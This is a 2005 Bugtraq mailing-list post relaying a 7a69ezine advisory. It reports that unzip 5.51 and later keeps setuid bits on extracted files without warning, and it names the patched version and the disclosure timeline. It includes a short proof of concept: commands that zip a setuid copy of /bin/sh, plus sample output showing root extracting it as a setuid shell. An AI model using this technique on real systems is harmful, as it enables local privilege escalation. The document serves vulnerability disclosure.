7a69Adv#22 - UNIX unzip keep setuid and setgid files

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: 7a69Adv#22 - UNIX unzip keep setuid and setgid files
From: Albert Puigsech Galicia <ripe@xxxxxxxxxxxxx>
Date: Mon, 28 Feb 2005 13:17:02 +0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: 7a69ezine.org
User-agent: KMail/1.7.2

- ------------------------------------------------------------------
       7a69ezine Advisories                      7a69Adv#22
- ------------------------------------------------------------------
  http://www.7a69ezine.org                            [26/01/2005]
- ------------------------------------------------------------------

Title:        Unzip keep setuid and setgid files

Author:       Albert Puigsech Galicia - <ripe@xxxxxxxxxxxxx>

Software:     Unzip

Versions:     >= 5.51

Remote:       No

Exploit:      yes

Severity:     Low/Medium

- ------------------------------------------------------------------



I. Introduction.

 UnZip is an extraction utility for archives compressed in .zip format. It's 
compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary 
objectives have been portability and non-MSDOS fuctionality. More info about 
unzip on http://www.info-zip.org/pub/infozip/UnZip.html.



II. Description.

 The unzip UNIX functionality allow you to maintain file permisions into 
compressed files, and of course that includes the setuid bit. Because it does 
not show a warning message before unpacking a setuid file is posible to create
a malicious ZIP file that creates an executable setuid.



III. Exploit

 It's realy easy to test this vulnerability. You can create a malicious ZIP 
file following this example:

 $ cp /bin/sh .
 $ chmod 4777 sh
 $ zip malicious.zip sh


 When another user (including root) unpacks the file, a setuid shell file will 
be created without any warning, as you can see here:

 # id
 # unzip malicious.zip
 Archive:  malicious.zip
  inflating: sh
 # ls -l sh
 -rwsrwxrwx  1 root root 705148 Jan 16 17:04 sh


 Of course ye need a local account on the system to execute the file, so it's 
not a remote vulnerability.




IV. Patch

        Upgrade to unzip 5.52.
 

V. Timeline

12/01/2005  -  Bug discovered
16/01/2005  -  Vendor contacted
21/01/2005  -  Vendor response
25/01/2005  -  Vendor patch provided
28/02/2005  -  New versión published
28/02/2005  -  Advisor published



VI. Extra data

 You can find more 7a69ezine advisories on this following link:

    http://www.7a69ezine.org/avisos/propios [spanish info]

Follow-Ups:
- Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files
  - From: John Simpson

Prev by Date: Re: Office 10 applications & flashdrives can be used to browse restricted drives
Next by Date: Re: iDEFENSE Security Advisory 02.25.05: WU-FTPD File Globbing Denial of Service Vulnerability
Previous by thread: [ GLSA 200502-30 ] cmd5checkpw: Local password leak vulnerability
Next by thread: Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files
Index(es):
- Date
- Thread